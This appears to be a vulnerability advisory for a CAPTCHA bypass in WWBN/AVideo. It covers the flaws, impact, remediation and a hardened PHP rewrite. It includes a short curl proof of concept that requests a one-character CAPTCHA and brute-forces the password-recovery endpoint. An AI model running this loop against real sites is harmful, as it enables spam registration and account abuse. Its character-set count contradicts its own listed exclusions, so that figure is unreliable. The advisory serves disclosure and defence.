# Vulnerability Summary: WWBN/AVideo CAPTCHA Bypass

## Vulnerability Overview

This vulnerability exists in the `WWBN/AVideo` project. An attacker can deterministically bypass the CAPTCHA by controlling the `ql` parameter (CAPTCHA length) of `getCaptcha.php` and exploiting the lack of a token invalidation mechanism. Three coordinated flaws are involved:

1. **External control of CAPTCHA strength**: The `ql` parameter has no minimum value restriction or type check, so an attacker can set it to 1 and obtain a single-character CAPTCHA.
2. **Small character set stored in session**: The CAPTCHA is generated only from 25 letters (A–Z excluding I, O, Q, U, V, W, X, Y, Z) and the digits 2–9, with no case distinction, resulting in extremely low entropy (approximately 33 possible combinations).
3. **Weak comparison and non-invalidated token**: The validation logic uses a case-insensitive comparison, and the CAPTCHA token in the session is cleared only on successful verification. When verification fails the token remains, allowing unlimited retries within the same session.

## Impact Scope

* **Affected versions**: `wwbn/avideo` <= 29.0
* **CVSS Score**: 5.3 / 10 (Moderate)
* **Attack Vector**: Network
* **Impact**:
  * Automated account creation / spam registration (`userCreate.json.php`)
  * User enumeration / password reset abuse (`userRecoverPass.json.php`)
  * Spam sending (`sendEmail.json.php`)
  * Comment / donation / wallet abuse (`donate.json.php`, `viewTransferFunds.json.php`)
* **Exploitation conditions**: No authentication required; the targets are publicly exposed anonymous endpoints.

## Remediation

1. **Restrict parameter range**: Clamp the `ql` parameter in `objects/getCaptcha.php` to a safe server-side range (e.g., 5 to 9).
2. **Force token invalidation**: In the `validation` function of `objects/captcha.php`, always `unset` the CAPTCHA token in the session regardless of success or failure, so that each guess consumes a fresh token.
3. **Enhance randomness**: Use a CSPRNG (such as `random_int`) instead of `str_shuffle` to generate the CAPTCHA, preventing predictability.

## POC Code

**Step 1: Obtain single-character CAPTCHA**

```bash
curl -c jar -s 'https://target/objects/getCaptcha.php?ql=1' -o /dev/null
```

**Step 2: Brute-force single-character answer**

```bash
for c in a b c d e f g h i j k l m n o p q r s t u v w x y z 2 3 4 5 6 7 8 9; do
  code=$(curl -b jar -s -o /tmp/r -w "%{http_code}" -X POST \
    'https://target/objects/userRecoverPass.php' \
    --data-urlencode 'user=root' \
    --data-urlencode 'recoverpass=1' \
    --data-urlencode "captcha=$c")   # double quotes so $c expands
  if ! grep -q 'Your code is not valid' /tmp/r; then
    echo "HIT with captcha=$c"
    break
  fi
done
```
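The three remediation points above, carried through as one added example in PHP. This is not AVideo's own code: the function names, the session key `captcha_text`, and the reduced alphabet are assumptions, and the clamp range 5–9 follows the remediation text.

```php
<?php
// Added example, not AVideo's code: hardened CAPTCHA generation and validation.
// Function names, session key and alphabet are assumptions for illustration.
declare(strict_types=1);

const CAPTCHA_ALPHABET = 'ABCDEFGHJKLMNPRST23456789'; // assumed alphabet, upper-case only
const CAPTCHA_MIN_LEN = 5;
const CAPTCHA_MAX_LEN = 9;
const CAPTCHA_SESSION_KEY = 'captcha_text';            // assumed session key

/** Remediation 1: clamp the client-supplied length to a safe server-side range. */
function captchaLength($ql): int
{
    // Missing or non-numeric input falls back to the minimum, never to 1.
    $len = filter_var($ql, FILTER_VALIDATE_INT);
    if ($len === false) {
        return CAPTCHA_MIN_LEN;
    }
    return max(CAPTCHA_MIN_LEN, min(CAPTCHA_MAX_LEN, $len));
}

/** Remediation 3: draw every character with a CSPRNG instead of str_shuffle(). */
function generateCaptcha(int $len): string
{
    $text = '';
    $last = strlen(CAPTCHA_ALPHABET) - 1;
    for ($i = 0; $i < $len; $i++) {
        $text .= CAPTCHA_ALPHABET[random_int(0, $last)];
    }
    $_SESSION[CAPTCHA_SESSION_KEY] = $text;
    return $text;
}

/** Remediation 2: the stored token is consumed on every attempt, pass or fail. */
function validateCaptcha(?string $guess): bool
{
    $expected = $_SESSION[CAPTCHA_SESSION_KEY] ?? null;
    unset($_SESSION[CAPTCHA_SESSION_KEY]);   // always, so a failed guess cannot be retried
    if ($expected === null || $guess === null) {
        return false;
    }
    // The alphabet is upper-case only, so normalising the guess accepts no extra
    // values; hash_equals() keeps the comparison constant-time.
    return hash_equals($expected, strtoupper($guess));
}

// Usage (assumes session_start() has already run):
// $text = generateCaptcha(captchaLength($_GET['ql'] ?? null));
// $ok   = validateCaptcha($_POST['captcha'] ?? null);
```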